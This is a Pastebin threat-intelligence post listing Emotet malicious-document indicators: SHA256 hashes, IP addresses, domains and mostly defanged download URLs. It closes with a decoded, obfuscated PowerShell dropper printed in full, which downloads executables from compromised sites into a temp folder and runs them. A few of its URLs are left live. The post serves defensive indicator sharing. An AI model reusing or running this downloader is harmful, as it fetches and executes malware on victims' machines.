API tools faq
paste
paladin316

Emotet_Doc_out_2020-08-18_12_05.txt

paladin316
Aug 18th, 2020
1,916
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.92 KB | None | 0 0
raw download clone embed print report
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4.  
  5. 4b2c463c130aa9358e9853fd7af4e476c3f9721168623f6befc47050979d936e
  6. 5c8b923944c5816b259806159d34a3d379b2c8f347ef3b69cbc5b18f60637d93
  7. a2abd583b4e4caacffb06a486754338888f244c02fbadfeb9c74b6d0260c25e6
  8. e7007d098ff3b77d307fdffbc2b566e6396298bfb9718bd207a8b377aca0b96a
  9. 8e917ba2db15e3b72b3f9a8c539719993270cb53a0d779cf77c22dab3c48ba14
  10. d2059efbb4bbbb1bbafc82ce09984c631cd46888fa36a570b8e40319766e4c35
  11. cbae984f113307015e9a42c646507cd4fecbc37c1ce7ed2fa9d731fdfff7e00f
  12. aecb14f5fd610dae65d94c788e6451f3f073561c8c00b0b62b4cf9d710c570ed
  13. 78159b47ee6e43a81e5f727e9f01d56700fb22cca0c9f6cde333e91c0130dee3
  14. e284647edaee2ed25f77af25077cf6abe3b9339e1890a0cae20dbfdc5bf1399f
  15. 503c77f99b0c8271cb80a1101e69d6c9060647f7a4a8451c23aae49bd344b634
  16. 14af02c786ea12c4843ad6860839b102eb8e62ee07901297724c921065dc3081
  17. 9f6acf9a0b1abf9481a13650ecdec0e7a9cb7a4c30938c2ffcca8da0934a96d2
  18. e2f0cb86eadbea45515eddee89bc46912333b4bf97129ee3cb33951aae3c3fc4
  19. 5b2f315f6910580a86de6995dc3bb3af0bba726b0292875fbeeb557d17759d57
  20. b4391434a4bd48c6f939fb55a7ed439917514aa935d56b3bf82123bcf44d1d54
  21. 41f1e702b57bab0ebc27e61570867b5417e34c5aa1b9046382207f7f62fd15ad
  22. 5adc805efc11587406fafe7de5332a37288953281fa45d077d79efd4b84a4410
  23. 97c4a455a266f18df4c26ce82ca2dce9c1411c24b190098b54f0ea98299c6025
  24. 7f43631f90c634b619bdcee6c8353e998541fad6790dc63774b1cf0cd1fbed67
  25. 4dba7674a65d6c5e1cd3a1ad7226c21f0b91705ac0a61326e58044947a641cac
  26. ce7f5157d0128d0740ec074ee8db6dd03e234c410111f7aa6832f7adc820cfe0
  27. 8e753065e300156e56580de3e895fe3aa55d7ec678c49eb160e2ca68534519c0
  28. a7c86fe81531f07b7120be70ff6f16519758654ccc7ae3c901cea8d36e3a21c9
  29. 08c50addda3b42db251a58aea5ee64018bd92bee3bccc61fd1f24b8f1b352a69
  30. 26db3179e1151f412ec9d5bb423d2acb8dfd4ef3adf67dc52e98646e1dabbfbc
  31. 1155743b446edd7735d9d8ed8687db0ee01b2230b0e87ba307f6f6a730bb38d2
  32. de7fd9eac5e5ecbf8e793422b73a8ba6efb5b97d1432e902106ea04bacf14a94
  33. 22c0f4e992bbe008bc8662329a78df594f5a5878400732952ef07f4cf83f3e48
  34. b1a5b0c45a385a514d7ee49f36e2df92b90949faf44927ad0a6540f39686a5f4
  35. c05713068f1705d81e3bcdac768839b40dafb7f82ac746d7b3933d60a22b29a8
  36. 94e51fa641e5b3a8e7516bab8ef519893aacd7d2328919f853585ac02e2a9899
  37. 13f007247a133e15c91b87cca369b39cc7b383603cbe773fb626e306a41a99d3
  38. f69601f9864bbeea46bf1889eaa312af133ec9e123070328a9bcebca523498d9
  39. 702c159af504d46bf306ca308aca23869b002d000423b17834506e0465b12df1
  40. 9ba1f593e77d663b73ca37090d03a3fb4b9046b625ff9ec1d00a34893fda3ff0
  41. 5cd6999ce87dc9415eec3e4277509ab4019c0dd0b086f7dd931154108deb6a52
  42. d0f2e774501d0aeea50a4ff21e17e958634c50bc481fff9f01ba41ae7355947c
  43. 63fc7bb7b01996cde65e632380bdd0c32da6c7245e64b85e45bcfcb4fb5e0af4
  44. 3a1b4e159222a6739951372391c9baac6618ca03702238a85423f720225591c6
  45. 6fa1409aee3b7332250c43cf6e6106c62bb9c6efd8f82ad49580164b45aff608
  46. af643dba5886cc3402429f593ef1a71d7cb377f0bca3dad9302fa1803a9b2324
  47. 8e7351f409ea3bafcb21e9b63e826625bd93d365c0feaff265ef7777c0f5e116
  48. ea9dfb49de29351fb9fae1e80177b3ed473f9229e5da8e2ae5eea121deb29760
  49. 77fbb539ddb2abc10dbbd056cd960899d723297cd2a680baba3a8f7180a2c59b
  50. 1e90425ec5f280794dcdf20c9e88789f38d0adb4b2ecfd0a9cdc3996930f52d8
  51. b112d8627b556a0c0ac19e877bdfe439b82cb1a1985603fa5c3a8b3de73a4fe0
  52. 29102965716e1fdfb0e0a9a633c56e9f1a6a17e0c8bcdabdf8efc3f37efd76e6
  53. 7c86327f0deeab1d9dd791f64c58e46fa7efdc401dbabe6013a80fa09fab74a8
  54. 248558f5b8547279882c012169b965765eab106c30275d475e3de2ba02e6c7e6
  55. 4e87fcc221d74df7d333623ad839fced4d060cd1b297adb04bd6f295d83890d3
  56. 6f0f54737b574488c42223ae81bd83ea0da431f0732413951fe4572ca19e6442
  57. 7e2991455103c6991e0b185681b90bc399d56d350e8a3553ec90b5bf6d99f2c1
  58.  
  59.  
  60. IPs:
  61. 162.214.65.60
  62. 167.114.252.85
  63. 173.249.157.230
  64. 45.173.88.33
  65. 68.44.137.144
  66. 69.30.203.214
  67. 83.150.213.216
  68.  
  69. Domains:
  70.  
  71. micromex.com
  72. www.marcovacca.com
  73. www.meltonian.net
  74. mikespub.net
  75. 1kocicikralovstvi.cz
  76. clanspectre.com
  77. www.fantasticz.org
  78. fanction.jp
  79. fourserious.com
  80. fastfoodz.atwebpages.com
  81. defiteqturkiye.com
  82. www.electropixel.com
  83. elevationadvertising.com
  84. etawala.com
  85. diamondbraintutor.com
  86.  
  87. URLs:
  88.  
  89. hxxps://micromex.com/wordpress/fQ4dV31/
  90. hxxp://www.marcovacca.com/img_albums/nzb/
  91. hxxp://www.meltonian.net/AjpEE/
  92. hxxp://mikespub.net/azure/o3J/
  93. hxxp://1kocicikralovstvi.cz/wp-includes/3z/
  94. hxxp://clanspectre.com/0_x9_l86icl169v/
  95. hxxp://www.fantasticz.org/y9p_ibr_oiwq7ke/
  96. hxxp://fanction.jp/assets/9s_yy_qt7jz09ve/
  97. hxxp://fourserious.com/wtof8_t_m9qazq4o2/
  98. hxxp://fastfoodz.atwebpages.com/wp-admin/jb8_k_g9d3v7/
  99. hxxp://defiteqturkiye.com/Uh/
  100. hxxp://www.electropixel.com/Te8qO04/
  101. hxxp://elevationadvertising.com/mobile/cb595319/
  102. hxxp://etawala.com/bae05905/
  103. hxxp://diamondbraintutor.com/wp-includes/2G33O54/
  104.  
  105.  
  106.  
  107.  
  108.  
  109. Decoded Base64 Powershell:
  110. $Dq9q9mo=('Z72yb8r');
  111. &('new-item') $env:tEMP\OffiCE2019 -itemtype diRecTORy;
  112. [Net.ServicePointManager]::"seCUriTYP`RO`T`OcOl" = ('tls12, tls11, tls');
  113. $Us1p12g = ('Atmgo6');
  114. $K1q4pck=('Gy452hn');
  115. $Cs6w69c=$env:temp+(('{0}Office2019{0}')-F[chAR]92)+$Us1p12g+('.exe');
  116. $Te4x_ho=('Wbsphp_');
  117. $I5vpzjq=.('new-object') NeT.WEbCliENt;
  118. $J4ev94z=('https://micromex.com/wordpress/fQ4dV31/
  119. hxxp://www.marcovacca.com/img_albums/nzb/
  120. hxxp://www.meltonian.net/AjpEE/
  121. hxxp://mikespub.net/azure/o3J/
  122. hxxp://1kocicikralovstvi.cz/wp-includes/3z/')."S`pliT"([char]42);
  123. $Hit1su0=('Sos_jd2');
  124. foreach($Z6q9ge4 in $J4ev94z){try{$I5vpzjq."Dow`NL`oA`DfILe"($Z6q9ge4, $Cs6w69c);
  125. $Qqvcwii=('I49ou7k');
  126. If ((.('Get-Item') $Cs6w69c)."Le`NgTh" -ge 36346) {&('Invoke-Item')($Cs6w69c);
  127. $Nuszxvh=('V8v1oo3');
  128. break;
  129. $N2259yc=('Ip1xup5')}}catch{}}$Rm1uila=('J93lxs8')$Rsr6itx=('Aug_0s9');
  130. .('new-item') $eNV:TEmP\office2019 -itemtype dIrectory;
  131. [Net.ServicePointManager]::"SEcU`Ri`TyprO`T`oCOL" = ('tls12, tls11, tls');
  132. $A_7oeyb = ('Lwxms9o');
  133. $B8g966r=('T1ubozj');
  134. $Qfjk49e=$env:temp+(('{0}Office2019{0}') -F [cHAR]92)+$A_7oeyb+('.exe');
  135. $Nqki3fv=('Bq0tbzp');
  136. $H_djs3h=&('new-object') neT.weBClient;
  137. $Fgqh92j=('hxxp://clanspectre.com/0_x9_l86icl169v/
  138. hxxp://www.fantasticz.org/y9p_ibr_oiwq7ke/
  139. hxxp://fanction.jp/assets/9s_yy_qt7jz09ve/
  140. http://fourserious.com/wtof8_t_m9qazq4o2/
  141. hxxp://fastfoodz.atwebpages.com/wp-admin/jb8_k_g9d3v7/')."sp`LiT"([char]42);
  142. $Ci4lnz9=('Cuii98b');
  143. foreach($H4xit6t in $Fgqh92j){try{$H_djs3h."dOwNLo`A`DFILE"($H4xit6t, $Qfjk49e);
  144. $It5bxgs=('Ix7p80w');
  145. If ((&('Get-Item') $Qfjk49e)."Len`gTh" -ge 21054) {.('Invoke-Item')($Qfjk49e);
  146. $U9g8025=('Dfh9mwg');
  147. break;
  148. $Fhs7oe9=('X015tjf')}}catch{}}$E9e076n=('Ztsak0_')$Yzlxjpj=('Ofl1x67');
  149. &('new-item') $EnV:TemP\offiCE2019 -itemtype DIrEcTOry;
  150. [Net.ServicePointManager]::"sE`c`URIt`YPr`OTOC`oL" = ('tls12, tls11, tls');
  151. $Pyzn4nw = ('Unrm2w6dd');
  152. $S0oadp1=('I0jjv9u');
  153. $J5gkdpt=$env:temp+(('{0}Office2019{0}') -f[Char]92)+$Pyzn4nw+('.exe');
  154. $T9e5g24=('Op8k6l5');
  155. $Nzg5f87=.('new-object') net.weBCLIeNt;
  156. $Nw1lwdn=('hxxp://defiteqturkiye.com/Uh/
  157. hxxp://www.electropixel.com/Te8qO04/
  158. hxxp://elevationadvertising.com/mobile/cb595319/
  159. http://etawala.com/bae05905/
  160. hxxp://diamondbraintutor.com/wp-includes/2G33O54/')."SPL`iT"([char]42);
  161. $Onzlotc=('Art8zt3');
  162. foreach($Ul3jyv7 in $Nw1lwdn){try{$Nzg5f87."d`ow`NLoaD`FilE"($Ul3jyv7, $J5gkdpt);
  163. $Tn78_j1=('Dyqytpl');
  164. If ((.('Get-Item') $J5gkdpt)."l`En`GTh" -ge 20439) {&('Invoke-Item')($J5gkdpt);
  165. $B1iij_h=('F51i7ca');
  166. break;
  167. $Jssq8ik=('Tf2cpnv')}}catch{}}$M3x5uls=('Rb3q_2j')
  168.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!